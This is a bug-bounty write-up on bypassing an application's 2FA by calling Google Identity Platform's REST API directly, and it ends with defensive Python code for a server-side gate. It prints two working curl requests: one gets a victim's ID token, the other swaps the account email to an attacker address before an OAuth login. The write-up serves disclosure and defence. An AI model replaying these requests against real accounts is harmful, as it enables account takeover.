2FA Bypass via Google Identity & OAuth Login

Sharat Kaikolamthuruthil
2 min read · Aug 7, 2022


Hello All,

This write-up is about another 2FA bypass that I found on a private program. The application used a third-party service for authentication; in this case it was the Google Cloud Platform service called Identity Platform.

After authentication, the application redirects users to the 2FA verification page.

Using the curl command given below, an attacker is able to retrieve the ID token of a 2FA-enabled account directly from the Identity Platform REST API, without ever passing through the application's 2FA page.

Get ID Token

curl 'https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=AIzaSr5kAE4GhcjsiwkNSks7sKSNbajsHn-SDk8' \
  -H 'Content-Type: application/json' \
  --data-binary '{"email":"victim@wearehackerone.com","password":"pass@1234","returnSecureToken":true}'

ID Token retrieved

Once the attacker has the token, the victim's account email can be updated to an email address the attacker controls. The attacker sets it to their own Gmail address, which is what will be used to bypass the 2FA.

Update email

curl 'https://identitytoolkit.googleapis.com/v1/accounts:update?key=AIzaSr5kAE4GhcjsiwkNSks7sKSNbajsHn-SDk8' \
  -H 'Content-Type: application/json' \
  --data-binary '{"idToken":"eyJhbGciOiJSUzI1NiIsImtpZCI6IjA2M2E3Y2E0M2MzYzc2MDM2NzRlZGE0YmU5NzcyNWI3M2QwZGMwMWYiLCJ0eXAiOiJKV1.eyJyTRHsasdhasdjhsakdhaksjdaskjdsakdnkkcnm-wqe7qw909231kjSAHYnAjdlkjlksajdAHkhjbbqjksapOkJlkjqwejqwlknebnasdbasdbksagdjhvqwjkeqwgufebsadkjbsakajshd7qw86wqdehjkwqt521kKLWSJDLAjdja;sdjas;dj;sajdlasjd;kajsd.DbRLQU1bhwWOMQ9e-6IPb4VJmMMLdepYxP85OwQ5jX9PGw200Wl7GypNvDSXWqK0ArdcoQnLfOB-q00u03R1GGjalFgkAJSRdX9yQDZThwUKKXPQRvJBcKTuYpMesXY5UlI-m0UfOP-RjWWFi_TVvbFDmC9kuhutQ3_FmJs7HUq0Rj0TzagjrHBuXf9zDCoxvoIoyKjee9RvtPcrPUK8o1xs8hs7SNX9ioKoe4VLeAFVTEn8YiAQS-VqnnCe64yPjhV4sAvuJ1uDGA-_z-IMRJO9aJ7f0jTmU-WNzIRwQlTEgCOeWONkwHe-qJSX2Ph1z9QQRyEsoaDLgIuOw9lciw","email":"attacker@gmail.com","returnSecureToken":true}'

After updating the email address, the attacker signs in through the Google OAuth option, which is the alternative login method provided by the application.

The attacker now logs in with "attacker@gmail.com" and its password, which grants them full access to the victim's account. The 2FA implementation is therefore bypassed: the second factor was only enforced by the application's redirect after login, not by the backend before a session was granted.

Since the attacker could gain complete access to the victim's account, it was triaged as a High severity bug.
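The root cause above is that the second factor lives only in a client-side redirect, so a valid ID token obtained from the provider's REST API, followed by an email change and a federated login, is enough. The following is an added example of how a backend can close that gap; it is not code from the original post or from Google. It assumes the server has already verified the ID token signature against the provider's public keys before this gate runs, that it records which (uid, auth_time) sign-ins completed the app's own 2FA step, and that it remembers the email each user had when they enrolled in 2FA. The claim names `sub`, `auth_time`, `email_verified` and `firebase.sign_in_provider` are standard Identity Platform / Firebase ID-token claims; `firebase.sign_in_second_factor` is assumed to be present only when the provider's own MFA was used. The tokens built by `make_token` are unsigned, constructed samples for the test only.

```python
"""
Server-side 2FA gate for an app that authenticates with Identity Platform
ID tokens.  Added example (not the post's or the provider's code).

Assumptions:
  * The ID token signature has already been verified upstream.
  * The app's 2FA endpoint calls mark_2fa_complete(uid, auth_time) only after
    a correct second factor for that exact sign-in.
  * enroll(uid, email) is called when the user sets up 2FA in the app.
"""
import base64
import json
import time


def jwt_claims(token: str) -> dict:
    """Extract the payload of a JWT.  Signature verification is assumed to
    have happened already; this function deliberately does not do it."""
    _header, payload_b64, _sig = token.split(".")
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def make_token(claims: dict) -> str:
    """Build an unsigned, test-only token in JWT layout (constructed sample)."""
    def b64(obj):
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return f"{b64({'alg': 'RS256', 'typ': 'JWT'})}.{b64(claims)}.unsigned"


class SecondFactorGate:
    """Deny-by-default session gate keyed on the sign-in, not on the client."""

    def __init__(self, max_signin_age: int = 3600):
        self.enrolled_email = {}      # uid -> email bound at 2FA enrollment
        self.completed = set()        # (uid, auth_time) pairs that passed 2FA
        self.max_signin_age = max_signin_age

    def enroll(self, uid: str, email: str) -> None:
        self.enrolled_email[uid] = email

    def mark_2fa_complete(self, uid: str, auth_time: int) -> None:
        """Called only by the 2FA verification endpoint after a correct OTP."""
        self.completed.add((uid, auth_time))

    def authorize(self, token: str, now: float = None):
        """Return (allowed, reason) for a verified ID token."""
        now = time.time() if now is None else now
        c = jwt_claims(token)
        uid, auth_time = c.get("sub"), c.get("auth_time")
        if not uid or auth_time is None:
            return False, "missing sub/auth_time"
        if c.get("exp", 0) <= now:
            return False, "token expired"
        if now - auth_time > self.max_signin_age:
            return False, "sign-in too old"
        if not c.get("email_verified", False):
            return False, "email not verified"
        enrolled = self.enrolled_email.get(uid)
        if enrolled is None:
            return False, "2FA not enrolled"
        # An email changed through accounts:update must not inherit the trust
        # of the enrolled address: a federated login that happens to match the
        # new address is treated as a different identity until re-enrolled.
        if c.get("email") != enrolled:
            return False, "email differs from enrolled email"
        fb = c.get("firebase", {})
        # Provider-enforced MFA (assumed claim) is accepted as the 2nd factor.
        if fb.get("sign_in_second_factor"):
            return True, "provider MFA"
        # Otherwise the app's own 2FA must have completed for THIS sign-in;
        # a fresh sign-in (new auth_time) never inherits an earlier completion.
        if (uid, auth_time) in self.completed:
            return True, "app 2FA completed"
        return False, "2FA not completed for this sign-in"
```

The gate ties 2FA completion to `auth_time`, so a new password or OAuth sign-in always has to pass the second factor again, and it compares the token's email with the one recorded at enrollment, so an `accounts:update` email swap followed by a Google login is refused rather than silently trusted.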

Hope you learned something new, have a good day. 😃

Disclaimer: For educational purposes only; please do not use this for illegal activities.
